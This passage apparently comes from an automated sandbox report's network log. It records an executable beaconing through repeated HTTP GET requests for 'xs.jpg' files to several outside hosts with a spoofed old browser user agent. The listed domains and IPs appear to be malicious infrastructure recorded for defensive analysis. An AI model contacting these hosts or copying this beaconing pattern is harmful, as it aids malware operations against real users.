                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159295|1720159259|3|10|0
                                  Jul 5, 2024 08:01:39.556778908 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:39 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159299|1720159259|3|11|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  53 | 192.168.2.9 | 49765 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:39.564642906 CEST | 302 | OUT | GET /xs.jpg?efa2e6a=-2033475142 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159295|1720159259|3|10|0
                                  Jul 5, 2024 08:01:40.164546967 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:40 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159300|1720159259|4|11|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  54 | 192.168.2.9 | 49766 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:40.362555027 CEST | 304 | OUT | GET /images/xs.jpg?f75905a=1556177436 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159296|1720159260|3|10|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:40.857371092 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:40 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159300|1720159260|3|11|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  55 | 192.168.2.9 | 49767 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:40.865485907 CEST | 190 | OUT | GET /xs.jpg?fbaba77=527791342 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:41.529639006 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:41 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  56 | 192.168.2.9 | 49768 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:41.547579050 CEST | 206 | OUT | GET /images/xs2.jpg?1055bd73=-1828476661 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:42.282222986 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:42 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:42.286184072 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:42.509443045 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:42 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:42 GMT
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  57 | 192.168.2.9 | 49769 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:42.749015093 CEST | 311 | OUT | GET /images/xs.jpg?1122b37b=1437434215 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159299|1720159259|3|11|0
                                  Jul 5, 2024 08:01:43.476800919 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:43 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159303|1720159259|3|12|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  58 | 192.168.2.9 | 49770 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:43.526164055 CEST | 303 | OUT | GET /xs.jpg?11c3299b=-1612941709 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159300|1720159259|4|11|0
                                  Jul 5, 2024 08:01:44.029588938 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:43 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159303|1720159259|3|12|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  59 | 192.168.2.9 | 49771 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:44.041870117 CEST | 305 | OUT | GET /images/xs.jpg?1208a479=1210225124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159300|1720159260|3|11|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:44.555166960 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:44 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159304|1720159260|3|12|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  60 | 192.168.2.9 | 49772 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:44.740868092 CEST | 191 | OUT | GET /xs.jpg?125c9be5=924177327 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:45.390753984 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:45 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  61 | 192.168.2.9 | 49773 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:45.423525095 CEST | 205 | OUT | GET /images/xs2.jpg?12dacc76=1265316312 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:46.145847082 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:46 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:46.147243023 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:46.370536089 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:46 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:46 GMT
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  62 | 192.168.2.9 | 49774 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:46.533504963 CEST | 312 | OUT | GET /images/xs.jpg?13a86083=-1326750565 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159303|1720159259|3|12|0
                                  Jul 5, 2024 08:01:47.265028000 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:47 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159307|1720159259|3|13|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  63 | 192.168.2.9 | 49775 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:47.290354967 CEST | 301 | OUT | GET /xs.jpg?14106f9c=673242936 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159303|1720159259|3|12|0
                                  Jul 5, 2024 08:01:47.794709921 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:47 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159307|1720159259|3|13|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  64 | 192.168.2.9 | 49776 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:47.824068069 CEST | 306 | OUT | GET /images/xs.jpg?14890695=-1538771800 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159304|1720159260|3|12|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:48.368688107 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:48 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159308|1720159260|3|13|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  65 | 192.168.2.9 | 49777 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:48.377470016 CEST | 192 | OUT | GET /xs.jpg?14e27329=1051154811 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:49.110450983 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:49 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  66 | 192.168.2.9 | 49778 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:49.164274931 CEST | 204 | OUT | GET /images/xs2.jpg?155951b4=716350312 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:49.914968967 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:49 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:49.916070938 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:50.141429901 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:49 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:49 GMT
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  67 | 192.168.2.9 | 49779 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:50.293629885 CEST | 311 | OUT | GET /images/xs.jpg?1651959c=1123336404 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159307|1720159259|3|13|0
                                  Jul 5, 2024 08:01:51.028297901 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:50 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159310|1720159259|3|14|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  68 | 192.168.2.9 | 49781 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:51.063458920 CEST | 303 | OUT | GET /xs.jpg?16b3e9bb=-2009630110 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159307|1720159259|3|13|0
                                  Jul 5, 2024 08:01:51.573628902 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:51 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159311|1720159259|3|14|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  69 | 192.168.2.9 | 49782 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:51.583508015 CEST | 305 | OUT | GET /images/xs.jpg?170da52a=1547080872 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159308|1720159260|3|13|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:52.101308107 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:52 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159312|1720159260|3|14|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
